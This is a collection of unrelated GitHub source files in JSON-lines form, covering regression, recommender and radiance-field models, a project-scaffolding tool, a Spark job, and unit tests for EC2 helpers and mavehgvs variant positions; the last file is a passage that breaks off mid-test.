+{"seq_id":"16723828931","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 15 23:34:35 2018\n\n@author: Shivam-PC\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib as plt\n\ndataset = pd.read_csv(\"50_Startups.csv\")\n\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 4].values\n\n# Encoding categorical data\n# Encoding the Independent Variable\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder_X = LabelEncoder()\nX[:, 3] = labelencoder_X.fit_transform(X[:, 3])\nonehotencoder = OneHotEncoder(categorical_features = [3])\nX = onehotencoder.fit_transform(X).toarray()\n\n# removing dummy valiable trap\nX = X[:, 1:]\n\n\n#splitting dataset\n#spitting the dataset into 
training set and text set\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split( X , y, test_size=0.2, random_state=0)\n\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\nprint(regressor.score(X_test, y_test))\n\n#predicting the testset result\ny_pred = regressor.predict(X_test) \n\n\n# Building the optimal model using backward elimination\nimport statsmodels.formula.api as sm\n# appending a columns of 1 for b0 part of formula\nX = np.append(arr=np.ones((50,1)).astype(int), values=X, axis=1) \nX_opt = X[:, [0, 1, 2, 3, 4, 5]]\n\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\n#fitting all variables\nX_opt = X[:, [0, 1, 3, 4, 5]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\n#removing highest p if p>0.05 \nX_opt = X[:, [0, 3, 4, 5]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\n#removing highest p if p>0.05 \nX_opt = X[:, [0, 3, 5]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\n#removing highest p if p>0.05 \nX_opt = X[:, [0, 3]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\n# AutomaticBackward Elimination with p-values and Adjusted R Squared:\nimport statsmodels.formula.api as sm\ndef backwardElimination(x, SL):\n numVars = len(x[0])\n temp = np.zeros((50,6)).astype(int)\n for i in range(0, numVars):\n regressor_OLS = sm.OLS(y, x).fit()\n maxVar = max(regressor_OLS.pvalues).astype(float)\n adjR_before = regressor_OLS.rsquared_adj.astype(float)\n if maxVar > SL:\n for j in range(0, numVars - i):\n if (regressor_OLS.pvalues[j].astype(float) == maxVar):\n temp[:,j] = x[:, j]\n x = np.delete(x, j, 1)\n tmp_regressor = sm.OLS(y, x).fit()\n adjR_after = tmp_regressor.rsquared_adj.astype(float)\n if (adjR_before >= adjR_after):\n x_rollback = np.hstack((x, temp[:,[0,j]]))\n x_rollback = np.delete(x_rollback, j, 1)\n print (regressor_OLS.summary())\n return x_rollback\n else:\n continue\n regressor_OLS.summary()\n return x\n \nSL = 0.05\nX_opt = X[:, [0, 1, 2, 3, 4, 5]]\nX_Modeled = backwardElimination(X_opt, SL)\n\n","repo_name":"agrawalshivam66/Udemy-machine_lerning","sub_path":"Multiple_Linear_Regression/Multiple_Linear_Regression.py","file_name":"Multiple_Linear_Regression.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41258143573","text":"from datetime import date\n\ndata = {}\nthisYear = date.today().year\ndata['name'] = str(input('Name: '))\nbirthDate = int(input('Birth date: '))\ndata['age'] = thisYear - birthDate\ndata['CTPS'] = int(input('CTPS: '))\n\nif (data['CTPS'] != 0) :\n data['hiring'] = int(input('Hiring year: '))\n data['salary'] = float(input('Salary: '))\n data['retirement'] = data['age'] + (35 - (thisYear - data['hiring']))\n\nprint('~=' * 30)\n\nfor k, v in data.items():\n print(f'The {k} has the value {v}')","repo_name":"joelmedeiros/studies.py","sub_path":"Fase19/Challange92.py","file_name":"Challange92.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70134988104","text":"\"\"\"\nProject scaffolding tool.\n\nCreates files from blueprints pulled from `files_base`, replacing some variables.\n\nIgnores files which are already present -> delete them to have new ones 
created.\n\nAssumptions:\n\n - gitlab repos, if not gitlab.com are deemed as private\n - gitlab pages server on http\n\n\n\"\"\"\n\nimport json\nimport os\nimport readline\nimport sys\nfrom datetime import date\nfrom functools import partial\n\nimport requests\nimport toml\nimport yaml\n\nfrom devapp.app import app, do\nfrom devapp.tools import exists, get_deep, read_file, write_file\n\ntoday = date.today()\nhere = lambda: os.getcwd()\ng = lambda k, v, d=None: getattr(k, v, d)\n\n\ndef do(*a, d=do, **kw):\n kw['ll'] = kw.get('ll', 10)\n return d(*a, **kw)\n\n\nfiles_base = 'https://raw.githubusercontent.com/axiros/docutools/master/'\nget_file_master = lambda fn: requests.get(files_base + fn).text\n\nFiles = [\n 'make',\n 'environ',\n 'mkdocs.yml',\n 'pyproject.toml',\n 'scripts/conda.sh',\n 'scripts/self_update',\n 'docs/mdreplace.py',\n 'docs/about/changelog.md',\n 'docs/about/coverage.md',\n 'docs/about/credits.md',\n 'docs/about/todo.md',\n 'docs/about/navigation.md',\n 'config/coverage.lp.ini',\n 'config/coverage.pytest.ini',\n 'config/pytest.ini',\n]\n\n\nclass vars:\n have = {}\n variables = set()\n\n class project_name:\n pyproj_key = 'tool.poetry.name'\n env_key = 'PROJECT'\n dflt = lambda: os.path.basename(here())\n\n class project_description:\n pyproj_key = 'tool.poetry.description'\n\n class pyver:\n env_key = 'pyver'\n pyproj_key = 'tool.poetry.dependencies.python'\n dflt = lambda: '%s.%s' % (sys.version_info.major, sys.version_info.minor)\n\n def validate(v):\n l = v.split('.', 1) # ^3.5 -> 3.\n return l[0][-1] + '.' + l[1]\n\n class version:\n pyproj_key = 'tool.poetry.version'\n dflt = lambda: '%s.%02d.%02d' % (today.year, today.month, today.day)\n\n class author:\n pyproj_key = 'tool.poetry.authors'\n\n def dflt(_=lambda k: os.popen('git config --get user.%s' % k).read().strip()):\n return '%s <%s>' % (_('name'), _('email'))\n\n def validate(v: str):\n if isinstance(v, list):\n v = v[0]\n assert '@' in v and '<' in v and '>' in v, 'Require valid email'\n return v\n\n class license:\n pyproj_key = 'tool.poetry.license'\n dflt = 'Commercial'\n\n class repository:\n pyproj_key = 'tool.poetry.repository'\n exmpl = [\n 'https://github.com/mycompany/myproject',\n 'https://gitlab.mycompany.com/mycompany/myproject',\n ]\n\n def validate(v):\n assert v.startswith('https://'), 'Must start with https://'\n return v\n\n class dependencies:\n pyproj_key = 'tool.poetry.dependencies'\n dflt = lambda: get_toppest_devapp_pgk(['devapps'])\n\n def validate(v):\n if isinstance(v, str):\n v = (v, '*')\n if isinstance(v, tuple):\n v = {v[0]: '^' + v[1]}\n return v\n\n\nfor k in dir(vars):\n if isinstance(g(vars, k), type) and not k[0] == '_':\n vars.variables.add(g(vars, k).__name__)\n\n\nclass Have:\n git = {}\n environ = {}\n pyproject = {}\n mkdocs = {}\n prev_answers = {}\n\n def load_previous_answers():\n a = json.loads(read_file(fn_answ(), dflt='{}'))\n if a:\n app.info('Using previous answers at', fn=fn_answ(), **a)\n Have.prev_answers.update(a)\n\n def read_environ_files():\n # for f in 'environ', 'environ.personal':\n # fn = here() + '/' + f\n # if os.path.exists(fn):\n # dependent on /bin/sh, too unreliable - he has to source it:\n # p = os.popen('source \"%s\" only; env' % fn).read().splitlines()\n # for line in p:\n # l = line.split('=', 1)\n # Have.environ[l[0]] = l[1]\n Have.environ.update(os.environ)\n\n def load_pyproject_toml():\n fn = here() + '/pyproject.toml'\n if exists(fn):\n Have.pyproject.update(toml.load(fn))\n\n def load_mkdocs():\n fn = here() + '/mkdocs.yml'\n if 
exists(fn):\n s = read_file(fn)\n y = yaml.load(s, Loader=yaml.Loader)\n Have.mkdocs.update(y)\n\n\ndef fn_answ():\n return '/tmp/ops_proj_answers_%s.json' % today\n\n\ndef ask(k, ex=''):\n answers = Have.prev_answers\n v = answers.get(k)\n if v:\n return v\n if ex:\n if isinstance(ex, str):\n ex = [ex]\n s = '' if len(ex) == 1 else 's'\n print('Example%s: ' % s + ', '.join(ex))\n r = input('Require value for \\x1b[1;32m%s\\x1b[0m [q: quit]: ' % k)\n if r in ('', 'q'):\n app.info('bye...')\n sys.exit(1)\n answers[k] = r\n write_file(fn_answ(), s=json.dumps(answers, indent=4, sort_keys=True))\n return r\n\n\ndef get_toppest_devapp_pgk(p, version=None):\n from pip._internal.commands.show import search_packages_info\n\n while True:\n for k in search_packages_info(p):\n f = k.required_by\n if f:\n return get_toppest_devapp_pgk(f)\n return k.name, k.version\n\n\ndef set_var(V):\n cls, v = g(vars, V), None\n k = g(cls, 'pyproj_key')\n if k:\n v = get_deep(k, Have.pyproject, dflt='')\n if not v:\n k = g(cls, 'env_key')\n if k:\n v = Have.environ.get(k)\n if not v:\n v = g(cls, 'dflt', lambda: None)\n if callable(v):\n v = v()\n exampl = g(cls, 'exmpl', '')\n if not v:\n v = ask(V, ex=exampl)\n val = g(cls, 'validate')\n if val:\n while 1:\n try:\n v = val(v)\n break\n except Exception as ex:\n Have.prev_answers.pop(V, 0)\n app.error('Cannot validate', key=V, value=v, reason=str(ex))\n v = ask(V, exampl)\n app.info(V, value=v)\n vars.have[V] = v\n\n\ndef homepage(repo):\n l = repo.split('/')\n h, g, n = l[-3], l[-2], l[-1]\n if 'gitlab' in repo:\n return 'http://%s.%s/%s' % (g, h.replace('gitlab', 'pages'), n)\n elif 'github' in repo:\n return 'https://%s.github.io/%s/' % (g, n)\n app.warn('Cannot derive docu homepage - using repo', homepage=repo)\n return repo\n\n\ndef ymldict(nav):\n d = {}\n for m in nav:\n d[list(m.keys())[0]] = list(m.values())[0]\n return d\n\n\ndef is_private():\n r = vars.have['repository']\n if '//gitlab' in r and not 'gitlab.com' in r:\n return True\n\n\ndef private_pypi():\n fn = os.environ['HOME'] + '/.config/pypoetry/config.toml'\n if not exists(fn):\n return app.info('No private pypi config found', fn=fn)\n t = toml.load(fn)\n return [\n {'name': k, 'secondary': True, 'url': v['url']}\n for k, v in t.get('repositories', {}).items()\n if v['url'].endswith('simple/')\n ]\n\n\nclass files:\n written = []\n skipped = []\n\n def adapt_environ(s):\n lines = s.splitlines()\n for k, n in [['PROJECT', 'project_name'], ['pyver', 'pyver']]:\n r = []\n while lines:\n l = lines.pop()\n if l.startswith(k + '='):\n l = k + '=\"%s\"' % vars.have[n]\n r.append(l)\n lines = r\n return '\\n'.join(lines)\n\n def adapt_mkdocs_yml(s):\n y = yaml.load(s, Loader=yaml.Loader)\n h = vars.have\n y['repo_name'] = h['project_name']\n y['repo_url'] = h['repository']\n y['site_description'] = h['project_description']\n y['site_name'] = h['project_name']\n y['site_url'] = do(homepage, h['repository'])\n n = ymldict(y['nav'])['About']\n y['nav'] = [{'Overview': 'index.md'}]\n y['nav'].append({'About': n})\n return yaml.dump(y)\n\n def adapt_pyproject_toml(s):\n h = vars.have\n t = toml.loads(s)\n T = t['tool']['poetry']\n # fmt:off\n T['authors'] = [h['author']]\n T['dependencies'] = h['dependencies']\n T['description'] = h['project_description']\n T['homepage'] = do(homepage, h['repository'])\n T['license'] = h['license']\n T['name'] = h['project_name']\n T['packages'] = [{'from': 'src', 'include': h['project_name']}]\n T['repository'] = h['repository']\n if is_private():\n T['source'] = 
private_pypi()\n T['version'] = h['version']\n # fmt:on\n T['dependencies'].update({'python': '^' + h['pyver']})\n T['dev-dependencies'] = {'docutools': '*'}\n return toml.dumps(t)\n\n def write(fn):\n s = get_file_master(fn)\n if not '\\n' in s:\n s = get_file_master(s)\n if not '\\n' in s:\n app.die('Cannot get master file', fn=fn)\n\n f = g(files, 'adapt_' + fn.replace('.', '_').replace('/', '_'))\n if f:\n s = f(s)\n write_file(fn, s, mkdir=True)\n files.written.append(fn)\n\n def write_all():\n for fn in Files:\n if exists(here() + '/' + fn):\n app.debug('ignoring (exists already)', fn=fn)\n files.skipped.append(fn)\n continue\n do(files.write, fn, ll=20)\n app.info(\n 'Change report', json={'skipped': files.skipped, 'created': files.written}\n )\n\n\ndef dev_install():\n do(Have.load_previous_answers)\n do(Have.read_environ_files)\n do(Have.load_pyproject_toml)\n do(Have.load_mkdocs)\n for V in sorted(vars.variables):\n do(set_var, V)\n do(files.write_all)\n sys.exit(1)\n # mk_file.write\n # write_env_file(proj_vars)\n # write_mkdocs_yml\n\n # app.debug('finding base package')\n # have = get_current_dir_state_vars()\n # p = get_toppest_devapp_pgk(['devapps',])\n # app.debug('base package', name=p)\n\n # breakpoint() # FIXME BREAKPOINT\n # print('foo')\n","repo_name":"AXGKl/devapps","sub_path":"src/devapp/plugins/ops_devapp/project/devinstall/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17873852357","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\nfrom pyspark.sql.types import *\nfrom pyspark.sql import functions as F\nfrom functools import partial\nimport os\n\nspark = SparkSession.builder.getOrCreate()\nspark.sparkContext.setLogLevel(\"ERROR\")\nsc = spark\nhadoop_conf = sc._jsc.hadoopConfiguration()\nhadoop_conf.set(\"fs.s3a.impl\", \"org.apache.hadoop.fs.s3a.S3AFileSystem\")\nhadoop_conf.set(\"fs.s3a.endpoint\", os.environ[\"MINIO_URL\"])\nhadoop_conf.set(\"fs.s3a.access.key\", \"minio-root-user\")\nhadoop_conf.set(\"fs.s3a.secret.key\", \"minio-root-password\")\nhadoop_conf.set(\"fs.s3a.path.style.access\", \"True\")\n\nsummoner_detail_df = spark.read.format(\"delta\").load(\n \"s3a://league-of-data-silver/summoner/detail\"\n)\nsummoner_data_df = summoner_detail_df.drop(\n \"summonerId\", \"summonerName\", \"profileIconId\"\n)\nsummoner_data_unique_df = summoner_data_df.dropDuplicates([\"puuid\", \"extracted_at\"])\nsummoner_data_unique_revision_df = summoner_data_unique_df.withColumn(\n \"revisionDate\",\n F.from_unixtime(summoner_data_unique_df.revisionDate / 1000, \"yyyy-MM-dd HH:mm:ss\"),\n)\nsummoner_data_unique_revision_df.write.mode(\"overwrite\").partitionBy(\"puuid\").format(\n \"delta\"\n).save(\"s3a://league-of-data-gold/summoner/detail/\")\n","repo_name":"anologicon/league-of-data-ingestion","sub_path":"dags/spark/gold_summoner.py","file_name":"gold_summoner.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"26357574439","text":"import pytest\nimport boto3\nfrom pytest_mock import mocker\nfrom ec2ools import aws\n\nclass Test:\n\n\n def test_get_region(self, mocker):\n \"\"\"\n \"\"\"\n co_mock = mocker.patch('ec2ools.aws.subprocess.check_output')\n co_mock.return_value = '{\"region\": \"us-compton-1\"}'\n\n assert aws.REGION is None\n assert aws.get_region() == 'us-compton-1'\n assert 
aws.REGION == 'us-compton-1'\n assert co_mock.call_count == 1\n\n # test caching\n assert aws.get_region() == 'us-compton-1'\n assert co_mock.call_count == 1\n\n\n def test_client(self, mocker):\n \"\"\"\n \"\"\"\n pass\n\n def test_metadata(self, mocker):\n \"\"\"\n \"\"\"\n co_mock = mocker.patch('ec2ools.aws.subprocess.check_output')\n co_mock.return_value = b'instance-id: i-testid'\n\n assert aws.metadata('instance-id') == 'i-testid'\n\n\n\n def test_metadata_exception(self, mocker):\n \"\"\"\n \"\"\"\n co_mock = mocker.patch('ec2ools.aws.subprocess.check_output')\n co_mock.return_value = '{\"region\": \"us-compton-1\"}'\n","repo_name":"ibejohn818/ec2ools","sub_path":"tests/test_aws.py","file_name":"test_aws.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33469073552","text":"import pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\n# set pandas to show all columns without truncation and line breaks\npd.set_option('display.max_columns', 1000)\npd.set_option('display.width', 1000)\n\n# data = np.loadtxt('data/test-data.csv', delimiter=',', dtype=int, skiprows=1,)\ndata = pd.read_csv('data/test-data.csv')\nprint(data)\n\n# reset the column.index to be numeric\nuser_index = data[data.columns[0]]\nvideo_index = data.columns\ndata = data.reset_index(drop=True)\ndata[data.columns[0]] = data.index.astype('int')\n# print(data)\n# print(data)\nscaler = 10\n\n# data = pd.DataFrame(data.to_numpy(), index=range(0,len(user_index)), columns=range(0,len(video_index)))\ndf_long = pd.melt(data, id_vars=[data.columns[0]], \n ignore_index=True, \n var_name='video_id', \n value_name='rate').dropna()\ndf_long.columns = ['user_id', 'video_id', 'rating']\ndf_long['rating'] = df_long['rating'] / scaler\n# replace the user_id to user by match user_index\ndf_long['user_id'] = df_long['user_id'].apply(lambda x: user_index[x])\n# data = df_long.to_numpy()\n\n#print(df_long)\n\ndataset = df_long\n# Encode the user and movie IDs\nuser_encoder = LabelEncoder()\nvideo_encoder = LabelEncoder()\ndataset['user_id'] = user_encoder.fit_transform(dataset['user_id'])\ndataset['video_id'] = video_encoder.fit_transform(dataset['video_id'])\n\n# Split the dataset into train and test sets\n# train, test = train_test_split(dataset, test_size=0.2, random_state=42)\ntrain = dataset\n\n# Model hyperparameters\nnum_users = len(dataset['user_id'].unique())\nnum_countries = len(dataset['video_id'].unique())\n\n\nembedding_dim = 64\n\n# Create the NCF model\ninputs_user = tf.keras.layers.Input(shape=(1,))\ninputs_video = tf.keras.layers.Input(shape=(1,))\nembedding_user = tf.keras.layers.Embedding(num_users, embedding_dim)(inputs_user)\nembedding_video = tf.keras.layers.Embedding(num_countries, embedding_dim)(inputs_video)\n\n# Merge the embeddings using concatenation, you can also try other merging methods like dot product or multiplication\nmerged = tf.keras.layers.Concatenate()([embedding_user, embedding_video])\nmerged = tf.keras.layers.Flatten()(merged)\n\n# Add fully connected layers\ndense = tf.keras.layers.Dense(64, activation='relu')(merged)\ndense = tf.keras.layers.Dense(32, activation='relu')(dense)\noutput = tf.keras.layers.Dense(1, activation='sigmoid')(dense)\n\n# Compile the model\nmodel = tf.keras.Model(inputs=[inputs_user, inputs_video], outputs=output)\nmodel.compile(optimizer='adam', loss='mse', 
metrics=['mae'])\n\nmodel.fit(\n [train['user_id'].values, train['video_id'].values],\n train['rating'].values,\n batch_size=64,\n epochs=100,\n verbose=0,\n # validation_split=0.1,\n)\n\nresult_df = {}\nfor user_i in range(1, 10):\n user = f'User{user_i}'\n result_df[user] = {}\n for video_i in range(1, 7): \n video = f'Video {video_i}'\n pred_user_id = user_encoder.transform([user])\n pred_video_id = video_encoder.transform([video])\n result = model.predict(x=[pred_user_id, pred_video_id], verbose=0)\n result_df[user][video] = result[0][0]\nresult_df = pd.DataFrame(result_df).T\nresult_df *= scaler\n\nprint(result_df)\n\n","repo_name":"zcxey2911/NeuralCollaborativeFiltering_NCF_Tensorflow","sub_path":"ncf_tensorflow.py","file_name":"ncf_tensorflow.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"74577229064","text":"import torch\nimport tinycudann as tcnn\nfrom .tensor_base import TensorBase\nimport numpy as np\nfrom icecream import ic\nfrom mutils import normalize\nimport torch.nn.functional as F\nfrom modules import util\n\ndef init_weights(m):\n if isinstance(m, torch.nn.Linear):\n # torch.nn.init.xavier_uniform_(m.weight, gain=np.sqrt(2))\n torch.nn.init.kaiming_uniform_(m.weight)\n torch.nn.init.constant_(m.bias, 0)\n\nclass TCNNRF(TensorBase):\n def __init__(self, aabb, encoder_conf, enc_dim, max_resolution, lr_density, init_scale, calibrate=True, roughness_bias=-1, tint_offset=0, diffuse_offset=-1, enc_mul=1, **kwargs):\n super().__init__(aabb, **kwargs)\n\n # self.nSamples = 1024 \n # self.nSamples = 512 \n self.nSamples = 1024\n diag = (aabb**2).sum().sqrt()\n self.stepSize = diag / self.nSamples\n self.calibrate = calibrate\n g = self.nSamples\n self.grid_size = torch.tensor([g, g, g])\n self.units = self.stepSize\n self.tint_offset = tint_offset\n self.diffuse_offset = diffuse_offset\n self.roughness_bias = roughness_bias\n self.enc_mul = enc_mul\n self.lr_density = lr_density\n\n self.separate_appgrid = False\n\n self.bound = torch.abs(aabb).max()\n bound = 1\n per_level_scale = np.exp2(np.log2(max_resolution * bound / encoder_conf.base_resolution) / (encoder_conf.n_levels - 1))\n ic(per_level_scale)\n\n self.encoding = tcnn.Encoding(3, encoding_config=dict(per_level_scale=per_level_scale, **encoder_conf))\n app_dim = encoder_conf.n_features_per_level * encoder_conf.n_levels\n self.n_features_per_level = encoder_conf.n_features_per_level\n self.n_levels = encoder_conf.n_levels\n # self.sigma_net = tcnn.Network(n_input_dims=self.app_dim, n_output_dims=1, network_config=dict(**network_config))\n torch.nn.init.uniform_(list(self.encoding.parameters())[0], -init_scale, init_scale)\n # torch.nn.init.constant_(list(self.encoding.parameters())[0], init_scale)\n self.sigma_net = util.create_mlp(app_dim, enc_dim, **kwargs)\n self.density_layer = util.create_mlp(enc_dim, 1, 1, initializer='kaiming')\n self.app_dim = enc_dim\n # self.sigma_net.apply(init_weights)\n\n def get_optparam_groups(self, lr_scale=1):\n grad_vars = [\n {'params': self.encoding.parameters(), 'lr': self.lr*lr_scale},\n {'params': self.sigma_net.parameters(), 'lr': self.lr_net*lr_scale},\n {'params': self.density_layer.parameters(), 'lr': self.lr_density*lr_scale},\n ]\n return grad_vars\n\n def density_L1(self):\n return torch.tensor(0.0, device=self.get_device())\n\n def check_schedule(self, iter, batch_mul):\n return False\n\n def coords2input(self, xyz_normed):\n return (xyz_normed[..., :3].reshape(-1, 
3)/2+0.5).contiguous()\n\n def calc_feat(self, xyz_normed):\n feat = self.encoding(self.coords2input(xyz_normed)).type(xyz_normed.dtype)\n # device = xyz_normed.device\n # scale = 2**torch.arange(0, self.n_levels, device=device).repeat_interleave(self.n_features_per_level)\n # var = xyz_normed[:, 3]\n # feat_scale = torch.exp(-(scale**2).reshape(1, -1) * var.reshape(-1, 1))\n # feat = feat_scale * feat * self.enc_mul\n h = self.sigma_net(feat)\n # sigfeat = h[:, 0]\n # h = h[:, 1:]\n sigfeat = self.density_layer(h)\n\n # x = feat\n # for i, layer in enumerate(self.sigma_net.children()):\n # x = layer(x)\n # if hasattr(layer, 'weight') and layer.weight.grad is not None:\n # ic(i, x[0], layer.weight.shape, layer.weight.mean(dim=0), layer.weight.grad.mean(dim=0))\n return sigfeat, h\n\n def _compute_feature(self, xyz_normed):\n sigfeat, h = self.calc_feat(xyz_normed)\n return sigfeat, h\n\n def _compute_appfeature(self, xyz_normed):\n sigfeat, h = self.calc_feat(xyz_normed)\n return h\n\n def _compute_densityfeature(self, xyz_normed):\n sigfeat, h = self.calc_feat(xyz_normed)\n return sigfeat\n\n def shrink(self, new_aabb, voxel_size):\n pass\n\n","repo_name":"half-potato/nmf","sub_path":"fields/tcnn.py","file_name":"tcnn.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"81"} +{"seq_id":"21909124045","text":"import unittest\nimport itertools\nimport random\nfrom mavehgvs.position import VariantPosition\nfrom mavehgvs.exceptions import MaveHgvsParseError\n\n\nclass TestObjectCreation(unittest.TestCase):\n def test_position_only(self) -> None:\n v = VariantPosition(\"8\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (8, None, None, None),\n )\n self.assertFalse(v.is_utr())\n self.assertFalse(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertFalse(v.is_extended())\n\n v = VariantPosition(\"92380\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (92380, None, None, None),\n )\n self.assertFalse(v.is_utr())\n self.assertFalse(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertFalse(v.is_extended())\n\n def test_amino_acid(self) -> None:\n v = VariantPosition(\"Gly8\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (8, \"Gly\", None, None),\n )\n self.assertFalse(v.is_utr())\n self.assertFalse(v.is_intronic())\n self.assertTrue(v.is_protein())\n self.assertFalse(v.is_extended())\n\n v = VariantPosition(\"Cys92380\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (92380, \"Cys\", None, None),\n )\n self.assertFalse(v.is_utr())\n self.assertFalse(v.is_intronic())\n self.assertTrue(v.is_protein())\n self.assertFalse(v.is_extended())\n\n def test_invalid_strings(self) -> None:\n position_strings = (\n \"08\",\n \"+12\",\n \"*-99\",\n \"A\",\n \"TCGA\",\n \"g\",\n \"*\",\n \"-\",\n \"+\",\n \"**6\",\n \"800 + 12\",\n \"-12*5\",\n \"Glu-12\",\n \"*5Trp\",\n \"Xyz12\",\n \"ALA12\",\n )\n for s in position_strings:\n with self.subTest(s=s):\n with self.assertRaises(MaveHgvsParseError):\n VariantPosition(s)\n\n def test_utr(self) -> None:\n v = VariantPosition(\"*8\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (8, None, None, True),\n )\n self.assertTrue(v.is_utr())\n self.assertFalse(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n v = 
VariantPosition(\"-80\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (-80, None, None, True),\n )\n self.assertTrue(v.is_utr())\n self.assertFalse(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n def test_intron(self) -> None:\n v = VariantPosition(\"122-6\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (122, None, -6, None),\n )\n self.assertFalse(v.is_utr())\n self.assertTrue(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n v = VariantPosition(\"78+10\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr), (78, None, 10, None)\n )\n self.assertFalse(v.is_utr())\n self.assertTrue(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n def test_utr_intron(self) -> None:\n v = VariantPosition(\"*89+67\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr), (89, None, 67, True)\n )\n self.assertTrue(v.is_utr())\n self.assertTrue(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n v = VariantPosition(\"-127+6\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (-127, None, 6, True),\n )\n self.assertTrue(v.is_utr())\n self.assertTrue(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n v = VariantPosition(\"*73-105\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (73, None, -105, True),\n )\n self.assertTrue(v.is_utr())\n self.assertTrue(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n v = VariantPosition(\"-45-1\")\n self.assertTupleEqual(\n (v.position, v.amino_acid, v.intronic_position, v.utr),\n (-45, None, -1, True),\n )\n self.assertTrue(v.is_utr())\n self.assertTrue(v.is_intronic())\n self.assertFalse(v.is_protein())\n self.assertTrue(v.is_extended())\n\n\nclass TestObjectRepresentation(unittest.TestCase):\n def test_repr(self) -> None:\n position_strings = (\n \"8\",\n \"92380\",\n \"*8\",\n \"-80\",\n \"122-6\",\n \"78+10\",\n \"*89+67\",\n \"-127+6\",\n \"*73-105\",\n \"-45-1\",\n \"Cys234\",\n \"Ala9\",\n )\n for s in position_strings:\n with self.subTest(s=s):\n v = VariantPosition(s)\n self.assertEqual(s, repr(v))\n\n\n# TODO: add amino acid variants\nclass TestComparisons(unittest.TestCase):\n def setUp(self) -> None:\n sorted_position_strings = (\n \"-45-1\",\n \"-12\",\n \"8\",\n \"99\",\n \"99+88\",\n \"99+122\",\n \"100-12\",\n \"100\",\n \"101\",\n \"202-12\",\n \"202-1\",\n \"202\",\n \"*1\",\n \"*73-105\",\n )\n\n self.sorted_variants = [VariantPosition(p) for p in sorted_position_strings]\n\n # pairwise itertools recipe\n a, b = itertools.tee(self.sorted_variants)\n next(b, None)\n self.sorted_variant_pairs = zip(a, b)\n\n def test_eq(self) -> None:\n for v in self.sorted_variants:\n with self.subTest(v=v):\n self.assertEqual(v, v)\n\n def test_ne(self) -> None:\n for v1, v2 in self.sorted_variant_pairs:\n with self.subTest(v1=v1, v2=v2):\n self.assertNotEqual(v1, v2)\n\n def test_lt(self) -> None:\n for v1, v2 in self.sorted_variant_pairs:\n with self.subTest(v1=v1, v2=v2):\n self.assertLess(v1, v2)\n\n def test_sorting(self) -> None:\n for _ in range(10):\n with self.subTest():\n shuffled_variants = self.sorted_variants.copy()\n while shuffled_variants == self.sorted_variants:\n random.shuffle(shuffled_variants)\n 
